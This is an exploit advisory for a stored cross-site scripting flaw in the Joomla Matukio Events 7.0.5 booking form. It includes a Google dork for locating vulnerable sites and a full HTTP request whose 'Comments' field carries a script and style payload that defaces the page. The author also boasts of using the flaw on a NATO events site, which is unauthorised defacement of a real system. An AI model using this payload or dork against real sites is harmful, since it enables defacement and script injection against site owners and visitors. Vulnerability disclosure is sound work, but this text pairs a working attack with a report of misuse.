Joomla Matukio Events component version 7.0.5 suffers from a persistent cross site scripting vulnerability.
a959c02e20b001c6222d36a485ad1a57
# Exploit Title:Joomla Matukio Events 7.0.5 Stored XSS
# Date:08.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://matukio.compojoom.com/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# My Youtube Channel : https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ
# Google Dorks: inurl:option=com_matukio
PoC:
I found simple , but interesting stored xss in Matukio Events.
https://matukio.compojoom.com/events/event/81-science/979-rocket-science
Press "Book Now":
Field "Comments" vulnerable to XSS and html code injection.
Put xss code and save this. It's works with different codes.
The code I like for the test:
https://pastebin.com/4V9sS7V3
Video:
https://youtu.be/HlTEcDqNxSM
Example on another site events.sto.nato.int
https://www.youtube.com/watch?v=pBY2UskIuNU
Host: matukio.compojoom.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)
Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------9492328303638924271813324098
Content-Length: 2816
Origin: https://matukio.compojoom.com
Connection: keep-alive
Referer: https://matukio.compojoom.com/events/book/979-rocket-science
Cookie: d9122e5739e92113272e5173db43cd67=72qdv1oufsi2avknr7614genno;
_ga=GA1.2.90714308.1615201744; _gid=GA1.2.178258541.1615201744
Upgrade-Insecure-Requests: 1
nrbooked=1&coupon_code=&field[3]=Mr&field[4]=&field[5]=azsxc&field[6]=ASD&field[8]=azsxc&field[9]=112233&field[10]=Zasx&field[11]=algeria&field[13][email protected]&field[14]=&field[15]=&field[16]=&field[17]=<style>body{visibility:hidden;}html{background:
url(https://img5.goodfon.ru/wallpaper/nbig/6/5d/kholst-kraska-mazki-abstraktsiia-canvas-paint-brush-strokes.jpg)
round;}</style><script>alert("Test
XSS")</script>&agb=Yes&revoke=Yes&uuid=&task=book.book&semid=979&formId=1&61c98812f3351c5686829fce5947bf84=1
(p.s.:
I don't publicly test the Joomla extensions anymore, but this time I
posted it publicly because I did xss art on the NATO site in this
component.)